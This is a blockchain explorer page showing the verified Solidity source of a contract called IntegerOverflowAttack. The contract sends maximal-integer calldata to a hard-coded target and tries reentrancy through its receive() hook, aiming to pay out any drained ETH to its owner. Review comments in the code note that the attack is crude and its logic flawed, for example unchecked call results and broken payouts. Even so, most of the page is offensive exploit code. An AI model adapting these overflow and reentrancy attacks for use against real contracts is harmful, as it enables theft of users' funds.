Cryo Explorer Ethereum Mainnet

Address Contract Verified

Address 0xc5EB8B4737ad91b236D3753517F04E9309001eA5
Balance 0 ETH
Nonce 1
Code Size 6242 bytes
Indexed Transactions 0

Contract Bytecode

6242 bytes
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

Verified Source Code Full Match

Compiler: v0.8.20+commit.a1b79de6 EVM: shanghai Optimization: No
uhoh.sol 171 lines
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Owner-gated probe contract: each entry point forwards a fixed 0.00001 ether to a
// hard-coded target through a low-level call whose calldata carries type(uint256).max
// arguments, then compares the target's ETH balance before and after the call.
//
// Review notes (defensive reading of the code below):
//  - Every low-level call result is stored and never checked, so a reverting target is
//    indistinguishable from a successful call inside these functions.
//  - No function sends ETH out except the conditional owner.call payouts, so value that
//    a failed call leaves in this contract has no withdrawal path.
//  - A target compiled with Solidity >= 0.8 reverts on arithmetic overflow unless the
//    operation sits in an `unchecked` block. The target's compiler version is not
//    visible here, so whether these payloads can have any effect is unknown.
//  - receive() re-enters the target during a callback. Targets that update state before
//    making external calls (checks-effects-interactions) or use a reentrancy guard are
//    not affected by that pattern.
contract IntegerOverflowAttack {
    // Hard-coded target of every external call in this contract.
    // NOTE(review): this value matches the address that default local development
    // chains (Hardhat/Anvil) assign to the first contract deployed by their first test
    // account. Confirm whether any code exists at it on the chain where this contract
    // was deployed. A low-level call to an address without code returns success and
    // simply transfers the attached value.
    address public constant VULNERABLE_CONTRACT = 0x5FbDB2315678afecb367f032d93F642f64180aa3;
    // Deployer address; the only account allowed to call the payable entry points.
    address payable public owner;

    // Records the deployer as owner.
    constructor() {
        owner = payable(msg.sender);
    }

    // Calls transfer(uint256,uint256) on the target with both arguments set to
    // type(uint256).max and 0.00001 ether attached, then pays the owner if the target's
    // balance dropped.
    // Reverts when the caller is not the owner, when msg.value is not exactly
    // 0.00001 ether, or when the payout to the owner fails.
    function executeOverflowAttack() public payable {
        require(msg.sender == owner, "Only owner can call");
        require(msg.value == 0.00001 ether, "Send exactly 0.00001 ETH");

        // Check initial balance of vulnerable contract
        uint256 initialBalance = VULNERABLE_CONTRACT.balance;

        // Calldata for transfer(uint256,uint256) with maximal arguments; the target's
        // ABI is assumed, not verified, by this contract.
        bytes memory overflowData = abi.encodeWithSignature(
            "transfer(uint256,uint256)",
            type(uint256).max,
            type(uint256).max
        );

        // Low-level call with 0.00001 ether attached. `success` is assigned and never
        // read, so a revert in the target passes silently and the ether stays here.
        bool success;
        (success, ) = VULNERABLE_CONTRACT.call{value: 0.00001 ether}(overflowData);

        // Re-read the target balance to detect an outflow
        uint256 finalBalance = VULNERABLE_CONTRACT.balance;

        // The difference is measured on the target, not on this contract. The payout
        // below comes out of this contract's own balance, so if the missing ETH went to
        // another address the owner.call fails and the whole transaction reverts.
        if (finalBalance < initialBalance) {
            uint256 profit = initialBalance - finalBalance;
            // Send profit to owner (minus the 0.00001 ETH used)
            uint256 refund = profit > 0.00001 ether ? profit - 0.00001 ether : 0;
            (bool sent, ) = owner.call{value: refund}("");
            require(sent, "Failed to send profit");
        }
    }

    // Same flow as executeOverflowAttack, with deposit(uint256) and a single
    // type(uint256).max argument as the calldata.
    function attackMethod2() public payable {
        require(msg.sender == owner, "Only owner can call");
        require(msg.value == 0.00001 ether, "Send exactly 0.00001 ETH");

        // Check initial balance
        uint256 initialBalance = VULNERABLE_CONTRACT.balance;

        // Calldata claims a deposit of type(uint256).max while only 0.00001 ether is
        // attached. A target that credits msg.value rather than a caller-supplied
        // amount is not exposed to this mismatch.
        bytes memory data = abi.encodeWithSignature(
            "deposit(uint256)",
            type(uint256).max
        );
        // Result is stored but never checked.
        bool success2;
        (success2, ) = VULNERABLE_CONTRACT.call{value: 0.00001 ether}(data);

        // Pay the owner from this contract's balance if the target balance dropped
        uint256 finalBalance = VULNERABLE_CONTRACT.balance;
        if (finalBalance < initialBalance) {
            uint256 profit = initialBalance - finalBalance;
            uint256 refund = profit > 0.00001 ether ? profit - 0.00001 ether : 0;
            (bool sent, ) = owner.call{value: refund}("");
            require(sent, "Failed to send profit");
        }
    }

    // Same flow as executeOverflowAttack, with calculate(uint256,uint256) and two
    // type(uint256).max arguments as the calldata.
    function attackMethod3() public payable {
        require(msg.sender == owner, "Only owner can call");
        require(msg.value == 0.00001 ether, "Send exactly 0.00001 ETH");

        // Check initial balance
        uint256 initialBalance = VULNERABLE_CONTRACT.balance;

        // Calldata for calculate(uint256,uint256) with maximal operands
        bytes memory data = abi.encodeWithSignature(
            "calculate(uint256,uint256)",
            type(uint256).max,
            type(uint256).max
        );
        // Result is stored but never checked.
        bool success3;
        (success3, ) = VULNERABLE_CONTRACT.call{value: 0.00001 ether}(data);

        // Pay the owner from this contract's balance if the target balance dropped
        uint256 finalBalance = VULNERABLE_CONTRACT.balance;
        if (finalBalance < initialBalance) {
            uint256 profit = initialBalance - finalBalance;
            uint256 refund = profit > 0.00001 ether ? profit - 0.00001 ether : 0;
            (bool sent, ) = owner.call{value: refund}("");
            require(sent, "Failed to send profit");
        }
    }

    // State used by the callback path below.
    // inCallback: true only while one of the trigger functions is inside its second call.
    bool public inCallback = false;
    // maxWithdrawals: cap on re-entrant calls per trigger; no function changes it.
    uint256 public maxWithdrawals = 10;
    // withdrawalCount: re-entrant calls made since the last trigger reset it to zero.
    uint256 public withdrawalCount = 0;

    // Sends the transfer(uint256,uint256) payload with 0.00001 ether, then calls
    // deposit() with no value while inCallback is set so that receive() re-enters.
    // NOTE(review): this function moves nothing to the owner; any ETH received by
    // receive() stays in this contract.
    function triggerRecursiveWithdrawal() public payable {
        require(msg.sender == owner, "Only owner can call");
        require(msg.value == 0.00001 ether, "Send exactly 0.00001 ETH");

        // Reset counter
        withdrawalCount = 0;

        // Calldata for transfer(uint256,uint256) with maximal arguments
        bytes memory overflowData = abi.encodeWithSignature(
            "transfer(uint256,uint256)",
            type(uint256).max,
            type(uint256).max
        );

        // Low-level call with the payload; the result check is commented out, so a
        // failure here does not stop the function.
        bool success;
        (success, ) = VULNERABLE_CONTRACT.call{value: 0.00001 ether}(overflowData);
        // require(success, "Overflow call failed");

        // Second call, made with inCallback set so receive() will re-enter the target.
        // FIXED: Use deposit() instead of withdraw() since withdraw() likely doesn't exist
        // NOTE(review): the function name says "withdrawal" but the selector is
        // deposit() and no value is attached. The re-entry only happens if the target
        // sends ETH back to this contract during that call.
        bytes memory callbackData = abi.encodeWithSignature("deposit()");
        inCallback = true;
        (success, ) = VULNERABLE_CONTRACT.call(callbackData);
        inCallback = false;

        // require(success, "Recursive withdrawal failed");
    }

    // Accepts plain ETH transfers. While inCallback is set and the transfer carries
    // value, calls deposit() on the target again, at most maxWithdrawals times per
    // trigger.
    receive() external payable {
        // Re-entry condition: the flag is set, value was received, and the cap has not
        // been reached. msg.sender is not checked, so a transfer from any address while
        // the flag is set takes this branch.
        if (inCallback && msg.value > 0 && withdrawalCount < maxWithdrawals) {
            withdrawalCount++;
            bytes memory withdrawData = abi.encodeWithSignature("deposit()");
            bool success4;
            (success4, ) = VULNERABLE_CONTRACT.call(withdrawData);
            // Don't check success to avoid breaking the loop
        }
    }

    // Variant of triggerRecursiveWithdrawal in which the second deposit() call also
    // attaches 0.00001 ether.
    // NOTE(review): msg.value is required to be exactly 0.00001 ether, but two calls
    // each attach 0.00001 ether. If the first call transfers its value, the second
    // depends on ETH this contract already held; otherwise it returns false, and that
    // result is ignored.
    function triggerReentrancyAfterOverflow() public payable {
        require(msg.sender == owner, "Only owner can call");
        require(msg.value == 0.00001 ether, "Send exactly 0.00001 ETH");

        // Reset counter
        withdrawalCount = 0;

        // Calldata for transfer(uint256,uint256) with maximal arguments
        bytes memory overflowData = abi.encodeWithSignature(
            "transfer(uint256,uint256)",
            type(uint256).max,
            type(uint256).max
        );

        // Low-level call with the payload; the result check is commented out.
        bool success;
        (success, ) = VULNERABLE_CONTRACT.call{value: 0.00001 ether}(overflowData);
        // require(success, "Overflow call failed");

        // Second call with inCallback set so receive() will re-enter the target
        bytes memory reentrancyData = abi.encodeWithSignature("deposit()");
        inCallback = true;
        (success, ) = VULNERABLE_CONTRACT.call{value: 0.00001 ether}(reentrancyData);
        inCallback = false;

        // require(success, "Reentrancy attack failed");
    }
}

Read Contract

VULNERABLE_CONTRACT 0xcda4feaa → address
inCallback 0x1295bdcb → bool
maxWithdrawals 0x8ae11770 → uint256
owner 0x8da5cb5b → address
withdrawalCount 0x71706cbe → uint256

Write Contract 5 functions

These functions modify contract state and require a wallet transaction to execute.

attackMethod2 0xe2388bbc
No parameters
attackMethod3 0x7a6c0276
No parameters
executeOverflowAttack 0x51111b04
No parameters
triggerRecursiveWithdrawal 0x9fb6832e
No parameters
triggerReentrancyAfterOverflow 0xd9d70102
No parameters

Recent Transactions

No transactions found for this address